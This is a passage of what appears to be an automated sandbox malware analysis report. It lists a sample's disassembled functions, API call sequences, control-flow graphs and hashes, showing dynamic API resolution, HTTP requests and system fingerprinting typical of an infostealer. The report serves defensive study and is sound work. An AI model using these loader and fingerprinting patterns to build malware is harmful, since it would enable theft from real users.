                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F216D
                                      • lstrlenW.KERNEL32(In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention ), ref: 002F2174
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrlen$Heap$AllocateProcessProtectVirtual
                                      • String ID: In the run up to the 2009 Greek legislative election, various organizations carried out opinion polling to gauge voting intention
                                      • API String ID: 2533436356-3600131318
                                      • Opcode ID: 7f2a42b5e8aa1455389344b04b50b2cf69102ef28f09cebb12c08146a31bf16c
                                      • Instruction ID: aace9e9488e672e10066e1e7ff2c193d8743fc39750bdc194dd6febb08a88961
                                      • Opcode Fuzzy Hash: 7f2a42b5e8aa1455389344b04b50b2cf69102ef28f09cebb12c08146a31bf16c
                                      • Instruction Fuzzy Hash: 1231A999F4032CF786DE6BB94C46DDE6E75FF8DB50B004656F52855180C9E056C0CEA3
                                      Function 003076E0 Relevance: 48.2, APIs: 32, Instructions: 222libraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1260 3076e0-30770b GetPEB 1261 307711-30791d call 2f6ac0 GetProcAddress * 20 1260->1261 1262 307922-307981 LoadLibraryA * 5 1260->1262 1261->1262 1264 307983-307991 GetProcAddress 1262->1264 1265 307996-30799d 1262->1265 1264->1265 1267 3079ca-3079d1 1265->1267 1268 30799f-3079c5 GetProcAddress * 2 1265->1268 1269 3079d3-3079e1 GetProcAddress 1267->1269 1270 3079e6-3079ed 1267->1270 1268->1267 1269->1270 1271 307a02-307a09 1270->1271 1272 3079ef-3079fd GetProcAddress 1270->1272 1274 307a36-307a39 1271->1274 1275 307a0b-307a31 GetProcAddress * 2 1271->1275 1272->1271 1275->1274
                                      APIs
                                      • GetProcAddress.KERNEL32(76E00000,02F404B8), ref: 00307748
                                      • GetProcAddress.KERNEL32(76E00000,02F402C0), ref: 00307761
                                      • GetProcAddress.KERNEL32(76E00000,02F402D8), ref: 00307779
                                      • GetProcAddress.KERNEL32(76E00000,02F403E0), ref: 00307791
                                      • GetProcAddress.KERNEL32(76E00000,02F3B368), ref: 003077AA
                                      • GetProcAddress.KERNEL32(76E00000,02F39F50), ref: 003077C2
                                      • GetProcAddress.KERNEL32(76E00000,02F3A0B0), ref: 003077DA
                                      • GetProcAddress.KERNEL32(76E00000,02F404D0), ref: 003077F3
                                      • GetProcAddress.KERNEL32(76E00000,02F40500), ref: 0030780B
                                      • GetProcAddress.KERNEL32(76E00000,02F40578), ref: 00307823
                                      • GetProcAddress.KERNEL32(76E00000,02F40410), ref: 0030783C
                                      • GetProcAddress.KERNEL32(76E00000,02F3A110), ref: 00307854
                                      • GetProcAddress.KERNEL32(76E00000,02F40518), ref: 0030786C
                                      • GetProcAddress.KERNEL32(76E00000,02F40530), ref: 00307885
                                      • GetProcAddress.KERNEL32(76E00000,02F39EB0), ref: 0030789D
                                      • GetProcAddress.KERNEL32(76E00000,02F40590), ref: 003078B5
                                      • GetProcAddress.KERNEL32(76E00000,02F40308), ref: 003078CE
                                      • GetProcAddress.KERNEL32(76E00000,02F3A050), ref: 003078E6
                                      • GetProcAddress.KERNEL32(76E00000,02F40548), ref: 003078FE
                                      • GetProcAddress.KERNEL32(76E00000,02F39F70), ref: 00307917
                                      • LoadLibraryA.KERNEL32(02F40428), ref: 00307928
                                      • LoadLibraryA.KERNEL32(02F402A8), ref: 0030793A
                                      • LoadLibraryA.KERNEL32(02F402F0), ref: 0030794C
                                      • LoadLibraryA.KERNEL32(02F40620), ref: 0030795D
                                      • LoadLibraryA.KERNEL32(02F40668), ref: 0030796F
                                      • GetProcAddress.KERNEL32(76F40000,02F405F0), ref: 0030798B
                                      • GetProcAddress.KERNEL32(76560000,02F405A8), ref: 003079A7
                                      • GetProcAddress.KERNEL32(76560000,02F405C0), ref: 003079BF
                                      • GetProcAddress.KERNEL32(76A70000,02F40638), ref: 003079DB
                                      • GetProcAddress.KERNEL32(761C0000,02F39ED0), ref: 003079F7
                                      • GetProcAddress.KERNEL32(77320000,02F3B2E8), ref: 00307A13
                                      • GetProcAddress.KERNEL32(77320000,02F388C8), ref: 00307A2B
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressProc$LibraryLoad
                                      • String ID:
                                      • API String ID: 2238633743-0
                                      • Opcode ID: 4e698fb258e79632b5a02c40b7c7fff47aa69bc259489189b6f9fc8292a11371
                                      • Instruction ID: a7f03e365414d975e8d594f190c4b0aa893b1dca17446210dde54bc697d92266
                                      • Opcode Fuzzy Hash: 4e698fb258e79632b5a02c40b7c7fff47aa69bc259489189b6f9fc8292a11371
                                      • Instruction Fuzzy Hash: B4A199B59012009FE725DF64ED989663BF9FFAA30070D8519E809C3364E774A90EFB11
                                      Function 0030BD50 Relevance: 25.1, APIs: 12, Strings: 2, Instructions: 634COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2075 30bd50-30bd65 2076 30bd74-30bd77 2075->2076 2077 30bd67-30bd71 2075->2077 2078 30bd86-30bd8f 2076->2078 2079 30bd79-30bd83 2076->2079 2080 30bd91-30bd94 2078->2080 2081 30bd9d-30bdb4 lstrcpy 2078->2081 2080->2081 2082 30bd96 2080->2082 2083 30c560 2081->2083 2084 30bdba 2081->2084 2082->2081 2086 30c565-30c56b 2083->2086 2085 30bdc0-30bdc3 2084->2085 2087 30bdc5 2085->2087 2088 30bdc8-30bdcb 2085->2088 2087->2088 2088->2085 2089 30bdcd-30bdd8 2088->2089 2090 30bdfa 2089->2090 2091 30bdda-30bde0 2089->2091 2093 30bdfd-30be06 2090->2093 2092 30bde3-30bde8 2091->2092 2092->2092 2094 30bdea-30bdf8 2092->2094 2095 30be08-30be19 call 309c90 2093->2095 2096 30be1b 2093->2096 2094->2090 2094->2093 2095->2096 2097 30be1e-30be24 2095->2097 2096->2097 2100 30be33-30be36 2097->2100 2101 30be26-30be31 call 30afe0 2097->2101 2103 30be38-30be47 call 30a300 2100->2103 2104 30be49-30be4c 2100->2104 2109 30be6f-30be71 2101->2109 2103->2109 2107 30be4e-30be5d call 30a440 2104->2107 2108 30be5f-30be62 2104->2108 2107->2109 2108->2083 2112 30be68-30be6a call 30a530 2108->2112 2109->2086 2114 30be77-30beb4 lstrcpy * 2 lstrlen 2109->2114 2112->2109 2116 30beb6-30bec8 lstrcat 2114->2116 2117 30bece-30bf22 lstrcpy 2114->2117 2116->2117 2118 30bf24-30bf27 2117->2118 2119 30bf35-30bf48 2117->2119 2118->2119 2120 30bf29-30bf2e 2118->2120 2121 30bf4a-30bf4f 2119->2121 2122 30bf5c 2119->2122 2120->2119 2121->2122 2123 30bf51-30bf5a 2121->2123 2124 30bf62-30c07c call 3092e0 2122->2124 2123->2124 2127 30c093-30c0aa 2124->2127 2128 30c07e-30c080 call 30a6e0 2124->2128 2129 30c0ac-30c0bc call 30a6e0 2127->2129 2130 30c0bf-30c0da 2127->2130 2132 30c085-30c090 2128->2132 2134 30c0f4-30c0fb 2130->2134 2135 30c0dc 2130->2135 2138 30c116 2134->2138 2139 30c0fd-30c113 GetDesktopWindow GetTickCount srand 2134->2139 2137 30c0e0-30c0e5 2135->2137 2137->2134 2140 30c0e7-30c0f2 call 309c40 2137->2140 2141 30c118-30c128 rand 2138->2141 2139->2138 2140->2134 2140->2137 2141->2141 2143 30c12a-30c143 2141->2143 2144 30c146-30c318 2143->2144 2144->2144 2146 30c31e-30c325 2144->2146 2147 30c327-30c32b 2146->2147 2148 30c33e-30c342 2146->2148 2147->2148 2149 30c32d-30c33a call 30a130 2147->2149 2150 30c344-30c348 2148->2150 2151 30c34f 2148->2151 2149->2148 2150->2151 2153 30c34a-30c34d 2150->2153 2154 30c351-30c358 2151->2154 2153->2154 2156 30c383 2154->2156 2157 30c35a-30c360 2154->2157 2158 30c389-30c394 2156->2158 2159 30c362-30c36b call 30bc30 2157->2159 2160 30c374-30c376 2157->2160 2162 30c3a4-30c3bb 2158->2162 2163 30c396-30c39b 2158->2163 2168 30c370-30c372 2159->2168 2160->2158 2161 30c378-30c381 call 30a740 2160->2161 2161->2158 2162->2086 2167 30c3c1-30c3c3 2162->2167 2163->2162 2166 30c39d-30c39e CloseHandle 2163->2166 2166->2162 2167->2132 2170 30c3c9-30c3f1 2167->2170 2168->2158 2171 30c3f7-30c3f9 2170->2171 2172 30c47e-30c488 2170->2172 2175 30c401-30c413 2171->2175 2176 30c3fb-30c3ff 2171->2176 2173 30c492-30c49d 2172->2173 2174 30c48a-30c48c 2172->2174 2177 30c4a0-30c4b7 call 309520 2174->2177 2178 30c48e-30c490 2174->2178 2179 30c421-30c442 call 30a290 2175->2179 2180 30c415-30c41a 2175->2180 2176->2172 2176->2175 2177->2132 2187 30c4bd-30c4c8 2177->2187 2178->2173 2178->2177 2185 30c470-30c47b 2179->2185 2186 30c444-30c45b call 3092e0 2179->2186 2180->2179 2186->2132 2193 30c461-30c46e call 30a290 2186->2193 2188 30c4cf-30c4d4 2187->2188 2188->2086 2190 30c4da-30c523 call 300a70 memcpy call 300a70 2188->2190 2199 30c533-30c53a 2190->2199 2200 30c525-30c530 2190->2200 2193->2185 2193->2188 2201 30c53c 2199->2201 2202 30c54f-30c55d 2199->2202 2203 30c540-30c54d 2201->2203 2203->2202 2203->2203
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: /$UT
                                      • API String ID: 0-1626504983
                                      • Opcode ID: 780225dac62c92a4d1047f2c7775830bd3efa98cf24e26eedb492cc975f8eddb
                                      • Instruction ID: 3dfd76d34abb15f68d1284825d3101811ad4302a191fe5e3dec9499360a637d6
                                      • Opcode Fuzzy Hash: 780225dac62c92a4d1047f2c7775830bd3efa98cf24e26eedb492cc975f8eddb
                                      • Instruction Fuzzy Hash: AE421571A113598FCB26CF69DC903EEBBB5FF59300F1581AAE84897381D7749A84CB90
                                      Function 002F5010 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 174networkfileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 2287 2f5010-2f5082 call 2ff850 call 2f3d70 call 2ff810 call 2ffa50 InternetOpenA StrCmpCA 2296 2f5087-2f5089 2287->2296 2297 2f5084 2287->2297 2298 2f508f-2f50af InternetConnectA 2296->2298 2299 2f51ea-2f51f3 call 2ff850 2296->2299 2297->2296 2300 2f50b5-2f50e6 HttpOpenRequestA 2298->2300 2301 2f51e3-2f51e4 InternetCloseHandle 2298->2301 2305 2f51f8-2f5217 call 2ff890 * 3 2299->2305 2303 2f50ec-2f50ee 2300->2303 2304 2f51d6-2f51e0 InternetCloseHandle 2300->2304 2301->2299 2306 2f5106-2f5136 HttpSendRequestA HttpQueryInfoA 2303->2306 2307 2f50f0-2f5100 InternetSetOptionA 2303->2307 2304->2301 2309 2f514c-2f5160 call 300a80 2306->2309 2310 2f5138-2f5147 call 2ff810 2306->2310 2307->2306 2309->2310 2318 2f5162-2f5164 2309->2318 2310->2305 2320 2f51cf-2f51d0 InternetCloseHandle 2318->2320 2321 2f5166-2f517f InternetReadFile 2318->2321 2320->2304 2321->2320 2323 2f5181-2f5186 2321->2323 2323->2320 2324 2f5188-2f51cd call 2ff9a0 call 2ff8f0 call 2ff890 InternetReadFile 2323->2324 2324->2320 2324->2323
                                      APIs
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00000001), ref: 002F3DA2
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,?,00000001), ref: 002F3DAF
                                        • Part of subcall function 002F3D70: ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,?,00000001), ref: 002F3DBC
                                        • Part of subcall function 002F3D70: lstrlen.KERNEL32(00000000,00000000,0000003C,?,00000001), ref: 002F3DD6
                                        • Part of subcall function 002F3D70: InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 002F3DE6
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002F5062
                                      • StrCmpCA.SHLWAPI(?,02F43058), ref: 002F507A
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002F50A2
                                      • HttpOpenRequestA.WININET(00000000,GET,?,02F45FE0,00000000,00000000,-00400100,00000000), ref: 002F50DC
                                      • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 002F5100
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002F510F
                                      • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 002F512E
                                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 002F5177
                                      • InternetReadFile.WININET(00000000,00000000,000007CF,?), ref: 002F51C5
                                      • InternetCloseHandle.WININET(00000000), ref: 002F51D0
                                      • InternetCloseHandle.WININET(?), ref: 002F51DA
                                      • InternetCloseHandle.WININET(00000000), ref: 002F51E4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internet$CloseHandleHttp$FileOpenReadRequestlstrcpy$ConnectCrackInfoOptionQuerySendlstrlen
                                      • String ID: ERROR$GET
                                      • API String ID: 1863336362-3591763792
                                      • Opcode ID: 747abad4cb3dc3d0ded44f63785aba51d6d8c1ee134d850492022992bdd55756
                                      • Instruction ID: cb05a0886ca97a0e7ab76c3f288fca1a059c7b3eed4cb93a728a76734757e090
                                      • Opcode Fuzzy Hash: 747abad4cb3dc3d0ded44f63785aba51d6d8c1ee134d850492022992bdd55756
                                      • Instruction Fuzzy Hash: F151C272A106196BEB20DB60CD46FFEB778EF54B40F144128FB05A72C1DB70AA05CBA5
                                      Function 00300420 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 124memorystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0030043C
                                      • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00300475
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003004BF
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 003004C6
                                      • wsprintfA.USER32 ref: 003004F9
                                      • lstrcat.KERNEL32(00000000,003138B4), ref: 00300508
                                      • GetCurrentHwProfileA.ADVAPI32(?), ref: 00300515
                                      • lstrlen.KERNEL32(00000000,Unknown), ref: 0030053E
                                      • lstrcat.KERNEL32(00000000,00000000), ref: 00300568
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heaplstrcat$AllocateCurrentDirectoryInformationProcessProfileVolumeWindowslstrlenwsprintf
                                      • String ID: :\$C$Unknown
                                      • API String ID: 2887641034-3557680648
                                      • Opcode ID: dd92e1c4f50a3c2e589cbb6b07227fd5f6e1480f8cc1159332f1e7011ee61b8e
                                      • Instruction ID: cdd63347a4131f9b937e4d75b1ca53bef2873dd16ffb63aaafcf3660ed0557f9
                                      • Opcode Fuzzy Hash: dd92e1c4f50a3c2e589cbb6b07227fd5f6e1480f8cc1159332f1e7011ee61b8e
                                      • Instruction Fuzzy Hash: 0141E171A1121CABEB15EBA4DD16FEEB77CAF15740F044164F609B7281EB705A04CBA2
                                      Function 00300900 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 141comCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CoInitializeEx.OLE32(00000000,00000000), ref: 00300928
                                      • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00300939
                                      • CoCreateInstance.COMBASE(003149C0,00000000,00000001,003148F0,?), ref: 00300953
                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0030098C
                                      • VariantInit.OLEAUT32(?), ref: 003009E3
                                        • Part of subcall function 00300CF0: LocalAlloc.KERNEL32(00000040,00000005,00000000,?,00300A09,?), ref: 00300CF8
                                        • Part of subcall function 00300CF0: CharToOemW.USER32(?,00000000), ref: 00300D05
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                      • VariantClear.OLEAUT32(?), ref: 00300A1B
                                      Strings
                                      Memory Dump Source
